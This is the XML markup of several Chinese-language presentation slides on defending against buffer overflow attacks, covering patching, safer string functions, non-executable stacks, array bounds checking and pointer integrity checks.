          <p:cNvPr id="303107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出只有在获得更高的特权时才有意义；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关闭一些不必要的特权程序就可以降低被攻击的风险。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pP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zh-CN" sz="3600"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>、及时给程序漏洞打补丁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大部分的入侵是利用一些已被公布的漏洞达成的；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如能及时补上这些漏洞，无疑极大的增强了系统抵抗攻击的能力。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pP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zh-CN" sz="3600"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>、编写正确的代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601663" y="1335088"/>
            <a:ext cx="7999412" cy="5027612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>在所有拷贝数据的地方进行数据长度和有效性的检查，确保目标缓冲区中数据不越界并有效；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>很多不安全程序的出现是由于调用了一些不安全的库函数。这些函数有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>等，用更安全的函数代替，比如用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞探测。利用一些工具，人为随机地产生一些缓冲区溢出来寻找代码的安全漏洞。已有这方面的一些高级的查错工具，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>fault injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>等。</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zh-CN" sz="3600"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>、非执行的缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306179" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1352862"/>
            <a:ext cx="8486775" cy="4763125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>通过使被攻击程序的数据段地址空间不可执行，从而使得攻击者不可能执行被植入被攻击程序输入缓冲区的代码，称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>非执行的缓冲区技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信号传递：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>通过向进程堆栈释放代码后引发中断来执行堆栈中的代码来实现向进程发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>信号。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>GCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的在线重用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在堆栈区里放置了可执行的代码作为在线重用之用，关闭该功能不产生任何问题。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>非执行堆栈保护可有效地对付把代码植入自动变量的溢出攻击，而对于其他形式的攻击则没有效果。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ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内容提要</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1399592" y="2024063"/>
            <a:ext cx="762000" cy="665162"/>
            <a:chOff x="1110" y="2656"/>
            <a:chExt cx="1549" cy="1351"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="645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18"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64523" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2009192" y="2633663"/>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24" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2288592" y="1976438"/>
            <a:ext cx="4591050" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出概述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64525" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1596442"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1399592" y="3319463"/>
            <a:ext cx="762000" cy="665162"/>
            <a:chOff x="3174" y="2656"/>
            <a:chExt cx="1549" cy="1351"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6452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2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22"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64526" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2021892" y="3929063"/>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27" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2342567" y="3271838"/>
            <a:ext cx="4464050" cy="579437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6600"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓冲区溢出攻击原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64528" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1596442" y="3417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64543"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en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 36"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412292" y="4758690"/>
            <a:ext cx="762000" cy="665163"/>
            <a:chOff x="1110" y="2656"/>
            <a:chExt cx="1549" cy="1351"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64549" name="AutoShape 37"/>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64550" name="AutoShape 3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64551" name="AutoShape 39"/>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64552" name="Line 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2021892" y="5368290"/>
            <a:ext cx="4800600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64553" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2283831" y="4711065"/>
            <a:ext cx="4708842" cy="579438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>缓冲区溢出攻击防御措施</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64554" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1609142" y="4857115"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38446885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zh-CN" sz="3600"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>、数组边界检查</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628832" y="1434242"/>
            <a:ext cx="7772400" cy="4606794"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数组边界检查能防止所有的缓冲区溢出的产生和攻击。方法包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的数组边界检查（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Jones &amp; Kelly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>内存存取检查（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Purify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>工具）：使用“目标代码插入”技术来检查所有的内存存取；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>安全语言：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>C#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>等。</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zh-CN" sz="3600"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>、指针完整性检查</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308227" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611187" y="1335088"/>
            <a:ext cx="8027987" cy="4990761"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>程序指针完整性检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：阻止由于函数返回地址或函数指针的改变而导致的程序执行流程的改变。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>原理：在每次在程序指针被引用之前先检测该指针是否已被恶意改动过，如果发现被改动，程序就拒绝执行。因此即使一个攻击者成功地改变程序的指针，由于系统事先检测到了指针改变，因此这个指针不会被使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="4200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>三个方向：堆栈检测、堆栈保护、保护指针</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ltLang="zh-CN" sz="3600"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>、其它防御方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="436562" y="1362076"/>
            <a:ext cx="8507413" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
